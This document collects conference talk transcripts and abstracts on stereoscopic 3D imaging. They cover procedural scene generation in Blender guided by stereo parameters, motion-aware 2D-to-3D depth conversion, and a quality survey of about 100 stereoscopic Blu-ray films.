So the idea is to introduce a rule like this, to decide the depth, the Z coordinate, of the geometry inside the stereoscopic frustum, limiting it to a range where the minimum Z can be the near plane of the camera or some other value decided by the user, and the maximum is given by this formula, where this term is the distance from the camera to the maximum parallax plane. I can calculate it because it's based on the field of view of the camera, the convergence, the distance of the convergence plane, the size of the sensor, from which you can go to the magnification factor and the size of the final image on the screen; all these parameters are known in a computer graphics setup. So I can calculate what the maximum parallax on screen will be and where the maximum distance leading to the maximum parallax plane is. And with this simple parameter ranging from 0 to 1, I can fill it. So from the top you see I've stopped at 0.5, which you can see as a percentage: 50%, 80%, 95%. It's quite simple and straightforward. But before showing you some examples, the problems. Blender, but also the other tools providing stereoscopic support, give you the tools: they let you set the interaxial distance, they let you set the convergence plane, they provide a visualization of the stereoscopic frustum planes so that you can manually place the objects inside the frustum, but they don't give you back the values. There are no panels in the graphical interface telling you, okay, the maximum parallax plane is that far. If it's equal to the far plane of the camera, okay, you're lucky. But otherwise you have no way to know where it is, nor is it provided in the API if you want to develop a script. So it's calculated inside the software, but it is not provided to the user, and you cannot use it from the beginning. In this case, rather than modifying the whole code of Blender, which is something that can be done when it's needed, because you also have to contact the Blender developers and there is some policy, we had to develop a Python script to recalculate the position of the maximum parallax plane in order to have it available for use in the generation. So we have to recompute something that is already calculated inside Blender but is not exposed by the software. Once you have it, you can apply the value in your generation script to create the geometry. So the problem is that the production software does not provide a full consideration of the stereoscopic setup in all the stages of the production. It is something that we may discuss. So now we have to switch to 3D. They are just three images, but then I have some other results at hand. Okay, maybe we may have to switch the lights off, I'm sorry. This is our scene with the fill parameter at 0.5. Now, if you look at the background, now 0.80, and 0.95, so almost filling the volume. So with just one parameter, I can control the automatic creation of this. In this scene, we have about 2,700 buildings and something like 170,000 triangles, all created procedurally. And the depth range is controlled by this one parameter. There are some window violations, I don't know if they are noticeable, but we will address them in the second technique. So we can go back to the 2D; keep your glasses near to you, because we have other results coming. Okay, so this was very simple. The second one is a bit more sophisticated. We have created the scene procedurally.
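A sketch of the frustum-filling rule described above: recompute the distance of the maximum-parallax plane from the virtual stereo camera, then map the user's 0-to-1 fill parameter onto that depth range. The formula follows the usual shifted-sensor stereo model and all numbers are illustrative assumptions; the exact expression used in the paper and the corresponding Blender API calls are not reproduced here.

```python
def max_parallax_distance(focal_mm, sensor_w_mm, screen_w_mm,
                          interaxial_m, convergence_m, max_parallax_mm):
    """Distance (m) from the camera to the plane whose on-screen positive
    parallax equals max_parallax_mm; returns inf if it is never reached."""
    mag = screen_w_mm / sensor_w_mm                  # sensor-to-screen magnification
    inv_z = 1.0 / convergence_m - max_parallax_mm / (mag * focal_mm * interaxial_m)
    return float("inf") if inv_z <= 0 else 1.0 / inv_z

def frustum_fill_depth(alpha, z_near, z_far):
    """Map the user's fill parameter alpha in [0, 1] to an actual scene depth."""
    return z_near + alpha * (z_far - z_near)

# Illustrative numbers: 35 mm lens on a 36 mm sensor, 3 m wide screen,
# 6.5 cm interaxial, convergence at 3 m, assumed 30 mm positive-parallax budget.
z_far = max_parallax_distance(focal_mm=35.0, sensor_w_mm=36.0, screen_w_mm=3000.0,
                              interaxial_m=0.065, convergence_m=3.0,
                              max_parallax_mm=30.0)
print(z_far)                                   # depth of the maximum-parallax plane
print(frustum_fill_depth(0.95, z_near=2.0, z_far=z_far))
```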
And in this scene it may happen that we have window violations, because some objects may be placed in the negative parallax area at the frame edges. So the idea was to detect these violations automatically and to automatically place the lateral masks of the floating window technique as actual 3D objects inside the scene, occluding the geometry that produces the violations. This technique has four steps. You already know how the floating window principle works: if we have an object causing retinal rivalry in the negative parallax area, we pretend the window is tilted like this in order to introduce a mask in the final scene. The most common way is to do it in post-processing, applying the lateral mask on the final image. We are considering applying it in 3D. Again, our approach is based on Boolean operations between the geometry of the scene and the frustum of the stereo camera. And again, the same problem as before: the frustum of the stereo camera is shown as a visual aid, but there is no way to access it as an actual 3D model to use in the scene. So we again had to implement a Python script in Blender to recalculate the values of the vertices of the planes building the camera frustum, and to use these vertices to create an actual 3D model to add to the scene graph, in order to use it for our purposes. Again, all these calculations are already done in Blender, but they are only provided as a visualization of where to place objects in order to have an idea of what the final depth will be. It is not very complicated, because we know the field of view and we know the distance of the convergence plane. We have calculated where the maximum parallax plane is, so it is just some trigonometry, and a little more, to find the vertices. Having done this, we have actual models; in this case, considering that we are doing a detection of window violations, we are interested in these two solids, the two negative parallax frustums that are represented here. Let's go fast: top view, you do it on both sides; you have the model, and you do a Boolean operation between the model and the solid of the negative parallax frustum. You detect this part, and in particular we need this point, because we have to place the mask here and this vertex does not exist. So now you need the point, and you find it simply by doing a depth rendering pass in order to have a depth image, a depth buffer, and you search for the minimum. It is trivial if you have one triangle; it is not trivial if you have thousands and thousands of triangles. Once you have this, you create an actual plane, a black plane, in the scene. At the beginning you can create it as large as you want; then you do another Boolean intersection between the frustum and the plane, and what you get is a patch in 3D placed in front of the geometry that occludes the geometry behind it. This is a visualization in 3D of the result. And maybe I will switch to the final video and not the image. I'm sorry, I am running very late. I'm not sure I will provoke the same enthusiastic reaction from the audience as shown there. This is the image at 0.95 without and with the floating window; maybe with these lights the floating window does not look so dark. Again another view, again with the floating window automatically applied, and finally this is a 20-second movie of our scene created with the floating window procedurally generated in each frame at the correct size.
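For illustration, here is an image-space variant of the floating-window step: find the nearest depth that touches an image border and derive the required mask width from its negative parallax. The talk instead places the mask as actual 3D geometry via Boolean operations in Blender; this standalone depth-map version, and its parameters, are assumptions made to keep the sketch self-contained.

```python
import numpy as np

def parallax_px(z, interaxial, convergence, focal_mm, sensor_w_mm, image_w_px):
    """Signed horizontal parallax in pixels for scene depth z (shifted-sensor
    model); negative values mean the point appears in front of the screen."""
    d_sensor_mm = focal_mm * interaxial * (1.0 / convergence - 1.0 / z)
    return d_sensor_mm / sensor_w_mm * image_w_px

def floating_window_width(depth_map, border="left", border_px=8, **stereo):
    """Mask width (pixels) needed on the given border, or 0 if no violation."""
    cols = depth_map[:, :border_px] if border == "left" else depth_map[:, -border_px:]
    z_nearest = cols.min()                     # nearest geometry touching the border
    p = parallax_px(z_nearest, **stereo)
    return max(0.0, -p)                        # only negative parallax violates the window

stereo = dict(interaxial=0.065, convergence=6.0, focal_mm=35.0,
              sensor_w_mm=36.0, image_w_px=1920)
depth_map = np.full((1080, 1920), 20.0)
depth_map[:, :40] = 3.5                        # a building pokes out at the left edge
print(floating_window_width(depth_map, "left", **stereo))
```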
So, again, more than 3,000 buildings and about 170,000 triangles, all created procedurally. Obviously you can create whatever you want and apply the same techniques. Very final remarks: the techniques are promising, and if you have the tools from the beginning, you can do whatever you want. If you don't have a better integration of stereoscopy inside the production pipeline, you will be limited. In the case of an open-source tool you can apply the modifications yourself or you can communicate with the community developing the tool. In the case of proprietary production tools there is the need for some discussion and collaboration with the developers. Thank you for your attention, just finishing with the joke.
|
Procedural generation of virtual scenes (like e.g., complex cities with buildings of different sizes and heights) is widely used in the CG movies and videogames industry. Even if this kind of scenes are often visualized using stereoscopy, however, to our knowledge, stereoscopy is not currently used as a tool in the procedural generation, while a more comprehensive integration of stereoscopic parameters can play a relevant role in the automatic creation and placement of virtual models. In this paper, we show how to use stereoscopic parameters to guide the procedural generation of a scene in an open-source modeling software. Virtual objects can be automatically placed inside the stereoscopic volume, in order to reach the maximum amount of parallax on screen, given a particular interocular distance, convergence plane and display size. The proposed approach allows to create again a virtual scene, given a particular context of visualization, avoiding problems related to excessive positive parallax in the final rendering. Moreover, the proposed approach can be used also to automatically detect window violations, by determining overlaps in negative parallax area between models and the view frustums of the stereoscopic camera, and to apply proper solutions, like e.g. the automatic placement of a floating window. © 2016, Society for Imaging Science and Technology (IS&T).
|
10.5446/32254 (DOI)
|
Margrit Gelautz is an associate professor at Vienna University of Technology, Austria. She directs a research group on image and video analysis and synthesis with a focus on 3D film and TV applications. Her presentation is Towards Perceptually Coherent Depth Maps in 2D-to-3D Conversion. So please. Thank you very much. Good morning, everybody. So as already mentioned, the title of this presentation is Towards Perceptually Coherent Depth Maps in 2D-to-3D Conversion, and it's joint work by Nicole Brosch, Tanja Schausberger and myself, Margrit Gelautz; we are affiliated with the Institute of Software Technology and Interactive Systems at Vienna University of Technology in Austria. So what am I going to talk about today? I'll first give a brief introduction. I'll say some words about the principles of semi-automatic 2D-to-3D conversion and then I'll focus on the algorithm we have developed. I'll first give an overview of the whole processing chain and then I'll focus in more detail on some of its specific components, some constraints we introduced, and one particular issue we are dealing with, the proper treatment of objects that exhibit motion in depth. I'll then present an experimental evaluation of the algorithm we designed. I'll show the effects of different versions of the algorithm and I'll also present a comparison to other competing algorithms. So just a few words: why do we need 2D-to-3D conversion nowadays? There's a broad range of 3D capturing devices already available, but of course if we are dealing with available 2D archives and we want to convert them to 3D, then those 2D-to-3D conversion techniques come into play. There are several ways to do that, and the one we are actually using is an interactive, semi-automatic approach. So in our algorithm we have some user-provided scribbles on the first and on the last frame, and these sparse depth values are then propagated throughout the whole video volume so that we finally get depth maps for every frame throughout the whole sequence. Some of the challenges we encounter in such algorithms concern coherence. We want to achieve spatio-temporal coherence, which means that the edges in the computed depth video should be aligned with the edges in the input video, and we also want to achieve perceptual coherence, which means in particular that our depth result should be consistent with monocular depth cues; in particular, we are taking a look at occlusions that are caused by object motion. So here is an example of what I mean by perceptual coherence. Let's take a look at this section of a video. We have the small dragon in the background that's coming closer. There's another dragon in the foreground, actually the big one here, and at some point in time the small dragon comes further into the foreground, so it's actually occluding the bigger object, the bigger dragon, which is now in the background. So it moves on. And what happens now in conventional 2D-to-3D conversion? Let's assume we have several frames of the input video, the first frame, the last frame and an intermediate frame, and the user draws some scribbles on the first frame, where the depth encoding is given here. So bluish colors of the scribbles mean the object is in front, and the yellow and reddish colors denote objects that are further in the back.
And in particular, if you take a look at the small dragon here, it's annotated in yellow, so it's rather far in the back, and on the last frame here it's annotated in blue, which means that in the meantime it has come further to the front. Thank you. So what happens now if we just do a straightforward depth interpolation between the first and the last frame for this particular scribble? That's when we might come to perceptually incoherent results, as shown here, because the depth value that's computed for the dragon on that intermediate frame actually indicates that the small dragon is still behind the bigger one, behind the big dragon, whereas the occlusions in the input video show us that it's actually the other way around. So that's an undesired effect that might come from a very straightforward depth interpolation, and in our algorithm we want to cope with that. Some of the related literature I'll just shortly mention: we start out with a video object segmentation algorithm that we extend to work as a 2D-to-3D conversion algorithm. There are three competing algorithms listed here, reference one, the work by Guttmann, reference three by Phan, and reference four by Eventchich. So we'll compare our results to those three algorithms, and the last two references refer to datasets that we are using in our tests: the Sintel and the New Tsukuba datasets. So let's now come to the algorithm itself. This is an overview. It contains several blocks; I'll just focus on the most important ones, and probably the most important one is the cost volume filtering block here. Based on the initial scribbles provided by the user, we are able to construct a cost volume that's based on color histograms from the input image, especially from those pixels that were covered by the user-provided scribbles, and we do an edge-preserving filtering of the cost volume using the guided image filter to come up with a filtered cost volume; then finally there's a depth assignment block which outputs the final 3D video. And here is one feature that's important to us: this temporal coherence block. I'll show on the next slide what we did here, as opposed to conventional stationary filtering where the filter window is centered at the same pixel in consecutive frames. We first do an optical flow computation and then we use the motion vectors to displace the filter window according to this observed motion. So that's one feature of the algorithm. There are several other blocks which I'll just mention very briefly. STC is a spatio-temporal closeness constraint and CON is a 3D connectivity constraint; these two constraints help us limit the influence of the user-provided scribbles to those pixels that are located in the vicinity of the scribbled pixels or that appear spatially connected in 3D space to the initial pixels. And here, DC is the depth change model. That's the part that tries to take care of the perceptual inconsistencies which I explained in the beginning. The basic idea of this module is that we do a detection of occlusions based on motion vectors, and these occlusions then help us determine the right depth order of individual segments. That's shown in some more detail here. We have an intermediate frame of the input video, and the colors here in this segmentation actually correspond to the user-provided colors, which encode depth values in the very first frame.
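The motion-guided temporal filtering idea can be sketched as follows: instead of averaging cost-volume slices at the same pixel position in consecutive frames, the filter support follows the optical flow. The spatial guided image filter used in the paper is omitted here, and the temporal blending weight is an assumption.

```python
import numpy as np
from scipy.ndimage import map_coordinates

def motion_guided_temporal_filter(cost_prev, cost_cur, flow_to_prev, alpha=0.7):
    """cost_prev / cost_cur: (H, W) cost slices for one depth label.
    flow_to_prev: (H, W, 2) backward flow (dx, dy) from frame t to frame t-1."""
    H, W = cost_cur.shape
    ys, xs = np.mgrid[0:H, 0:W].astype(np.float64)
    sample_y = ys + flow_to_prev[..., 1]          # displaced filter position
    sample_x = xs + flow_to_prev[..., 0]
    warped_prev = map_coordinates(cost_prev, [sample_y, sample_x],
                                  order=1, mode="nearest")
    return alpha * cost_cur + (1.0 - alpha) * warped_prev

# Toy usage: an object moved 3 px to the right between frames.
cost_prev = np.zeros((64, 64)); cost_prev[20:40, 10:30] = 1.0
cost_cur  = np.zeros((64, 64)); cost_cur[20:40, 13:33] = 1.0
flow = np.zeros((64, 64, 2)); flow[..., 0] = -3.0   # backward flow points left
print(motion_guided_temporal_filter(cost_prev, cost_cur, flow).max())
```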
And from this, from the optical flow vectors, I mentioned we derive occlusions, they are computed by detecting inconsistencies between the forward and backward optical flow and the motion vectors also give us information on which segment is in front of the other one. And this directed occlusion is shown by the errors here. So for example, this area is pointing from the light blue to the red area, so that means that the red segment is further in the back and it's partially occluded by the light blue segment. And a similar situation arises here where this little dragon which was annotated in yellow at the beginning which is partially occluding already the light blue region. We can now use this information, this partial occlusion information to construct a graph, it's a noncyclic directed graph, the nodes here correspond to the segments shown here, the edges encode this directed occlusion information and furthermore from the first frame and in some cases also from the last frame we have depth information, so in some cases the depth is fixed when the object wasn't found to move in depth, in some words in some cases like for the yellow, the dragon here, there is a depth range that was derived from the user's scribbles in the first and in the last frame. And we can now use the information in this graph here to automatically refine the depth information to derive some depth constraints for each intermediate frame and the important thing is that these newly computed depth constraints, they are consistent with the occlusions that we observed by our motion detection. So that's the basic idea of this algorithm, of this part of the algorithm, that's what I said already and let's now come to the evaluation part. So how did we set up our experiments? We had a range of test data, some of them were computer generated test data, especially the Sintel dataset and the new Tsukuba dataset and those synthetic data they came with ground truth information from the Sintel, we had the ground truth optical flow information and then we also had ground truth depth information, so that's important, the depth information for validating our approaches. So for the synthetic data, the reference, we had synthetic depth data of course and then we had also some self-recorded scenes for which we could compute stereo derived depth and in those cases we used the stereo derived depth as reference. So the scribbles were then initialized with the values from the depth reference, so that's a little bit different for the evaluations and then we carried out a quantitative assessment with test of the effects of different modules of our algorithm, the effect of the motion guided filtering and also the sensitivity to optical flow results. So let me now show some of the results. First regarding the perceptual coherence, that's the example I showed in the beginning, where we have the input frames, here the ground truth depth values and as I already pointed out in the beginning, there are some perceptual incoherences regarding occlusions if we just use linear depth interpolation and with our depth order guided interpolation we were able to correct these perceptual incoherences. Then we did quite a thorough evaluation by switching on and off different sections of the algorithm, different modules, so I won't explain all of that in detail, just give a broad overview. 
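A minimal sketch of the occlusion-based depth ordering just described, again only an illustration and not the authors' implementation: occlusions are flagged where the forward and backward optical flow are inconsistent, each occluded pixel votes for an "in front of" relation between two segments, and a topological sort of the resulting directed graph yields a depth order that is consistent with the observed occlusions. The flow fields, the segment map, the vote threshold and the use of frame-t labels at the flow target are all simplifying assumptions.

# Illustrative sketch of motion-based occlusion detection and depth ordering.
# Assumes: flow_fw maps frame t -> t+1 and flow_bw maps frame t+1 -> t (HxWx2 arrays),
# and `segments` is an HxW array of segment ids for frame t.
import numpy as np
from collections import defaultdict

def occlusion_mask(flow_fw, flow_bw, tol=1.0):
    """Pixels whose forward flow is not undone by the backward flow are
    treated as occluded in the next frame."""
    h, w = flow_fw.shape[:2]
    ys, xs = np.mgrid[0:h, 0:w]
    xt = np.clip(xs + flow_fw[..., 0], 0, w - 1).astype(int)
    yt = np.clip(ys + flow_fw[..., 1], 0, h - 1).astype(int)
    round_trip = flow_fw + flow_bw[yt, xt]          # should be roughly zero if visible
    return np.linalg.norm(round_trip, axis=2) > tol

def depth_order(segments, flow_fw, occluded, min_votes=50):
    """Directed relation 'A occludes B' means B is farther; a topological sort of
    the resulting graph gives a depth order consistent with the occlusions."""
    h, w = segments.shape
    ys, xs = np.mgrid[0:h, 0:w]
    xt = np.clip(xs + flow_fw[..., 0], 0, w - 1).astype(int)
    yt = np.clip(ys + flow_fw[..., 1], 0, h - 1).astype(int)
    votes = defaultdict(int)
    for y, x in zip(*np.nonzero(occluded)):
        behind = segments[y, x]                     # segment whose pixel disappears
        front = segments[yt[y, x], xt[y, x]]        # segment it disappears behind (approx.)
        if behind != front:
            votes[(front, behind)] += 1
    # Keep only confidently observed, non-contradictory relations.
    graph = defaultdict(set)
    for (front, behind), n in votes.items():
        if n >= min_votes and (behind, front) not in votes:
            graph[front].add(behind)
    # Kahn's topological sort: nearer segments come out first.
    nodes = set(np.unique(segments))
    indeg = {n: 0 for n in nodes}
    for front in list(graph):
        for behind in graph[front]:
            indeg[behind] += 1
    order, queue = [], [n for n in nodes if indeg[n] == 0]
    while queue:
        n = queue.pop()
        order.append(n)
        for m in graph[n]:
            indeg[m] -= 1
            if indeg[m] == 0:
                queue.append(m)
    return order

In the full algorithm this order is then combined with the depth values and depth ranges fixed by the first- and last-frame scribbles to constrain the interpolation on the intermediate frames.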
The orange results here, they were computed without considering the depth changes of the objects and then the greenish results here, they did a straight forward linear interpolation and the blue results here, the depth order guided interpolation. So in that case, the results, actually the depth order guided interpolation didn't improve the quantitative results, however, this was a test using ground truth optical flow, optical flow is used at several steps of the algorithm and if we now use switch to estimated optical flow which of course has some errors included, then we see that now the depth order guided interpolation also delivers quantitatively results that are quantitatively a little bit better than the straight forward linear interpolation. And what we can also see here, we have here TC refers to temporal coherence, that's the motion guided filtering and in all cases both for the estimated and the ground truth optical flow, the motion guided filtering was able to improve the results. So this is a comparison to three other algorithms and if one takes a look at these figures here in more detail, we find that our results which are coming to versions, the winner takes all and depth blending, depth assignment scheme, basically we outperform algorithm one, our good man in most of the cases, the same applies to the algorithm by Fenn and we are about, we deliver very similar results to algorithm four, so in four or five of the 11 test cases we outperform them. So that means in summary the results of the algorithm are competitive with other state of the art algorithms and finally this is just a visual example of how the algorithm can improve the depth interpolation, so we have the ground truth results here, the results by Fenn they have some inconsistent, some artifacts here in the depth reconstruction for example on the shoulder here and also the algorithm by Eventchich has similar artifacts on the head of the statue here whereas our result seems to deliver the visually best results. So that brings me now to the end of the talk just to summarize very quickly, I've presented a semi-automatic 2D to 3D conversion algorithm, it takes a step towards the generation of perceptually coherent depth maps, we took special care to incorporate motion based occlusion information to generate those that perceptual coherence, then the inclusion of motion guided filtering led to an improvement on the average of about 16% and the results were quite comparable to other state of the art algorithms. So what we might take a look at in the future, what we haven't done so far is we didn't care about the efficiency of the implementation so there's clearly room for improvement in this aspect and also regarding the initial scribble matching strategy which I didn't cover in detail and now there's some room, some possibility for improvement in terms of additional user support. So that brings me to the end and thank you very much for your attention. Thank you.
|
We propose a semi-automatic 2D-to-3D conversion algorithm that is embedded in an efficient optimization framework, i.e., cost volume filtering, which assigns pixels to depth values initialized by user-given scribbles. The proposed algorithm is capable of capturing depth changes of objects that move towards or farther away from the camera. We achieve this by determining a rough depth order between objects in each frame, according to the motion observed in the video, and incorporate this depth order into the depth interpolation process. In contrast to previous publications, our algorithm focuses on avoiding conflicts between the generated depth maps and monocular depth cues that are present in the video, i.e., motion-caused occlusions, and thus takes a step towards the generation of perceptually coherent depth maps. We demonstrate the capabilities of our proposed algorithm on synthetic and recorded video data and by comparison with depth ground truth. Experimental evaluations show that we obtain temporally and perceptually coherent 2D-to-3D conversions in which temporal and spatial edges coincide with edges in the corresponding input video. Our proposed depth interpolation can clearly improve the conversion results for videos that contain objects which exhibit motion in depth, compared to commonly performed naïve depth interpolation techniques. © 2016, Society for Imaging Science and Technology (IS&T).
|
10.5446/32255 (DOI)
|
Okay. Hello, everybody. I will describe some of our results and only briefly announce a lot of our other results, because we have very limited time for this pretty funny project. Okay. You know that currently it's a big problem in the industry because, as Forbes wrote, it's the great 3D fiasco and the 3D guys killed their own cash cow. It's bad news generally, but the good news is that it looks like it's currently possible to solve more and more of the problems that cause low-quality 3D. And when we talk with guys from science and guys from industry, it looks like these guys live in different universes. So this is one world of guys from Australia, and so on, and another world, an absolutely parallel world, of scientists. And it's a very big question how to build a bridge through all these walls, and we try to do this. Okay. What do we do? This is our project team and these are the Blu-ray discs that were analyzed. We analyzed all Blu-rays, all 3D Blu-rays with a budget noted on IMDB.com. This means that this is all non-documentary Blu-rays. And we measure trends, and we have worked in this area, the area of measurement of 3D quality, for the last eight years. So this is a pretty long project, and we measured 3D quality previously, but there was a very common question: you measure some value, but is it good or is it bad? How can you comment on this? And currently we can answer this question and we can consider different values. Also, we proposed new metrics; we created a channel mismatch metric and published results something like four years ago. But currently we have created a practical channel mismatch metric. This means that it has become approximately 100 times faster and more robust simultaneously. So it looks like we are the first guys in the world to create a practical channel mismatch metric that's so fast that it's possible to measure 100 movies. And also we created a new temporal shift metric and updated other metrics, and so on and so on. Oh, okay, parallax. Everybody here knows what this is. And we analyze movies, and if you see very, very, very big parallax on a big screen, your eyes will be damaged. And we measure trends, and you see here trends on 100 movies during the last years. Here is the zero level; this is negative parallax, this is positive parallax, so closer to the viewer, or behind the screen. And this is the level of Avatar. And these are the values of the front object and the farthest object in a scene, averaged over the movie. So you see how much visible depth different movies have. And these are the trend lines, and the bad news is that you see that depth becomes smaller and smaller and smaller. Here was Avatar, and you see that after Avatar we can see movies that sometimes have three or four times less visible depth than Avatar. This means that these movies will have good perceived depth only in the cinema. And when you buy the Blu-ray, like we did, and try to watch it on a small screen, the visible depth will be very small. Be careful. So it's better to go to the cinema. Okay, and there are a lot of other interesting results from this analysis, but anyway, let's move forward. This is, by the way, all movies sorted by visible depth. And you can see red means a converted movie, blue means a captured movie. And you can see, of course, most converted movies have small depth; every professional understands why. And this is Avatar. And this is Titanic. Titanic has one of the best visible depths in comparison with all other converted movies. Really, really great job. Really great job.
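As an illustration of how such a per-scene depth budget can be summarised, here is a small sketch that reduces an estimated disparity map to robust near and far parallax values; the percentile choice, the assumed screen width and the input disparity map are illustrative assumptions rather than the exact procedure behind these charts.

# Illustrative sketch (not the presented metric): summarising the parallax
# budget of a stereo frame from an estimated disparity map.
import numpy as np

def parallax_budget(disparity_px, frame_width_px, screen_width_m=10.0,
                    near_pct=1, far_pct=99):
    """disparity_px: per-pixel horizontal disparity in pixels
    (negative = in front of the screen, positive = behind it).
    Robust percentiles are used instead of min/max to ignore outliers."""
    near = np.percentile(disparity_px, near_pct)   # closest content
    far = np.percentile(disparity_px, far_pct)     # farthest content
    # Convert pixel disparity to physical on-screen parallax for a given screen.
    to_meters = screen_width_m / frame_width_px
    return {
        "near_parallax_m": near * to_meters,
        "far_parallax_m": far * to_meters,
        "depth_budget_px": far - near,             # overall visible depth range
    }

# Example usage (disp_map is an assumed HxW float disparity array for a 1920-wide frame):
# stats = parallax_budget(disp_map, 1920)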
And that's why people go to the cinema, see Avatar, see Titanic, see clearly visible depth, clearly visible, and enjoy. And you understand what people who go to this movie, for example, will get; you understand. So I will just announce this result: we also analyzed the general histogram of depth in movies, and red again means converted movies. And you can see that many converted movies have some strange steps in depth, so it's interesting to analyze how this not-so-smooth depth will decrease the visual performance of a 3D movie. Okay. So, as I told you, it looks like we are the first guys to create a practical channel mismatch measure. And this measure can find not only fully swapped views, but also special effects that are put at the wrong depth. For example, here you can see this guy in the foreground and this candle in the background, and this special effect is put at the depth of the candle, so in the background, but it is obviously in front of this guy. So at this moment you will see an absolutely impossible picture, and your brain will be damaged a little bit. And of course we found several scenes with absolutely swapped channels. Here are also absolutely swapped channels. And this is the histogram of movies with swapped channels. From these 100 analyzed Blu-rays, 23 have at least one scene with swapped channels. So there is a 21% probability that you will see at least one swapped-channel scene in a movie. Big enough. And the good news is that the biggest amount, the biggest percentage of such movies, was in 2010. And I suppose that you understand why: a lot of guys appeared in this industry who had never previously worked with stereo. And the percentage of such movies was even bigger for previous movies. And currently this parameter becomes lower and lower and lower. So I suppose that with our metric this will be zero in the future. It's possible, and there is a good reason to do this. And we also analyzed the visual discomfort for these scenes. And currently we are able to predict it; in short words, we can predict the visual discomfort from a scene with swapped channels, because if it is a dark scene, if it is a short scene, if it is a flat scene, the visual discomfort from swapped channels will be lower. And it's possible to predict this. And this is the trend line; my presentation is about trends, you remember. This is the trend line for channel mismatch by release date. And we see that unfortunately some movies may be not so good, but generally the situation becomes better. And the same situation with the budget: of course, movies with a smaller budget commonly have worse values here; it's easy to understand why. Okay. Color mismatch. Everybody understands what this is? And here are some samples. For example, like this. So 3D or journey. Also clearly visible color mismatch. And on the trend line we can see that generally the situation becomes better, fortunately. And it's interesting to analyze Resident Evil, the first and the second. We see that the situation became better. And the Step Up situation also became better. So the situation becomes better. But of course, maybe we have a good question for the not-so-good movies now. And generally we can see that this is Avatar. This is Avatar. And we see that Avatar was one of the best movies when it was released, but currently the level of color mismatch for Avatar falls in the red zone. So I'm absolutely sure that Avatar 2 will be essentially better than the first one. And the same analysis for budgets: of course, low-budget movies have worse values and high-budget movies are more accurate.
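For illustration, a very crude global proxy for colour mismatch between the two views can be computed from per-channel statistics, as sketched below; the published metric is more involved and works on disparity-compensated correspondences, so this is only meant to convey the idea.

# Very crude colour-mismatch proxy (not the published metric).
import numpy as np

def color_mismatch_score(left_rgb, right_rgb):
    """left_rgb, right_rgb: HxWx3 uint8 views of the same stereo frame.
    Returns a single non-negative number; 0 means identical global colour
    statistics, larger values mean a stronger mismatch."""
    l = left_rgb.reshape(-1, 3).astype(np.float64)
    r = right_rgb.reshape(-1, 3).astype(np.float64)
    mean_diff = np.abs(l.mean(axis=0) - r.mean(axis=0))   # brightness / tint shift
    std_diff = np.abs(l.std(axis=0) - r.std(axis=0))      # contrast shift
    return float(mean_diff.mean() + std_diff.mean())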
And you can see that avatar is the worth on this parameter in comparison with all high budget movies. So this means that new high budget movies are more accurate than avatar. Good news. And by the way, here we can see that some low budget movies have the same parameters as high budget movies. So currently it's possible to create even low budget movies on the same level of quality. So again, good news. Special symmetry. Everybody understand what this is when we see something like this. And generally this is not so painful but not so good. And again, timeline. And we can see that step up becomes naturally better from one to 10. And resident evil have the same values. So it looks like these guys began to use new technologies and these guys have not. And if you will analyze by budget also, of course, the same situation a lot of. And by budget you can see that step up, move it from red zone to green zone for this budget. So it's interesting analysis. Rotation. Currently we began to analyze separately. Rotation, zoom and other things because even small, generally a small shift, vertical shift is not so big problem. But when it's rotation, even for one degree, it's really painful. And you can see, for example, rotation here, shark knight. And rotation here, silent hill, crazy rotation. By the way, here you see that we show the worst sense and you maybe see that it's very common situation when this is horror movies. So we prove that this movies will be not only scary but also painful. Okay and again release dates. And again, step up. You see that step up was here in red zone and become essentially better than resident evil. Unfortunately not. And here is situation for budget and you see that again avatar have one of the worst values currently. Scale mismatch. Here is, we was really surprised how many scale mismatch sense was in computer graphics. And Piranha, space station again computer graphics. Guys. Start track. Again computer graphics. Crazy. And fortunately situation become better and the same situation on budget. Sharpness mismatch. When you see sharp, it's really painful and the same situation become better. Temporal shift. Pretty funny things. It's now a new metric. You see clearly visible. Temporal shift. Hugo, also clearly visible temporal shift. Step up. Clearly visible temporal shift. It's we found more than 500 scenes with temporal shift. So pretty big amount. By the way, it's funny. Very fast. I motion. And again situation. We can say that situation become better in temporal domain and in budget chart. And we create our reports. Currently it was published. And we have something close to 3,000 page in this reports. And report thousands of problems. A lot of downloaded, 28 contributed stereographers, their names. And next report will be published soon. Maybe in first quarter even. And we plan to reports during this year. And we have a lot of plans. And our goal is to predict fatigue by movie. So to predict percentage of disappointed viewers. It's very ambitious and challenging goal. But we move in this direction. And this you see that it's composite with 3D bluradisks. We see that no pain will be good gain for this industry. Thank you very much.
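As a rough illustration of how a temporal shift between the two views might be detected, one simple approach (an assumed approach, not the metric presented above) is to correlate per-frame activity signatures of the left and right streams and look for the lag that aligns them best; sub-frame shifts, which also occur in practice, are not handled by this sketch.

# Illustrative sketch: estimate a whole-frame temporal offset between left and
# right video streams by correlating their per-frame "activity" signatures.
import numpy as np

def activity_signature(frames):
    """frames: array-like of grayscale frames (T x H x W).
    Returns a 1-D signal: mean absolute difference between consecutive frames."""
    f = np.asarray(frames, dtype=np.float32)
    return np.abs(np.diff(f, axis=0)).mean(axis=(1, 2))

def estimate_temporal_shift(left_frames, right_frames, max_lag=5):
    """Returns the lag (in frames) that best aligns the two activity signals.
    A non-zero result suggests the views are temporally shifted."""
    a = activity_signature(left_frames)
    b = activity_signature(right_frames)
    a = (a - a.mean()) / (a.std() + 1e-8)
    b = (b - b.mean()) / (b.std() + 1e-8)
    best_lag, best_score = 0, -np.inf
    for lag in range(-max_lag, max_lag + 1):
        if lag >= 0:
            x, y = a[lag:], b[:len(b) - lag]
        else:
            x, y = a[:len(a) + lag], b[-lag:]
        n = min(len(x), len(y))
        score = float(np.dot(x[:n], y[:n]) / max(n, 1))    # normalised correlation
        if score > best_score:
            best_lag, best_score = lag, score
    return best_lag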
|
1) OBJECTIVE: The main objective of the large-scale quality analysis of S3D movies is to gain a better understanding of how quality control was performed in different movies. Also several novel quality metrics are presented, including channel swap detection, evaluation of temporal shifts between stereoscopic views and depth continuity. 2) METHOD: The main technical obstacle that we had to overcome was an enormous amount of computation and disc space required by such an analysis. Evaluation of one movie could take up to 4 weeks and required over 40GB for the source Blu-ray only. To maximize the efficiency we had to rewrite all of our metrics to exploit the multicore architecture of contemporary CPUs. We have also developed a system that efficiently distributes the computations across the cluster of up to 17 computers working in parallel. It enabled us to finish the evaluation of 105 movies in about 6 months. 3) RESULTS: An evaluation of 105 S3D movies’ technical quality has been conducted that span over 50 years of the stereoscopic cinema history. Our main observations are as follows: According to our measurements, “Avatar” in fact had a superior technical quality compared to the most S3D movies of the previous decade. So it is not surprising that it was positively received by the viewers. S3D quality improvement over the years is fairly obvious from the conducted evaluation, e.g. the results of average-quality movies from 2010 correspond to the results of the 2014 movies with 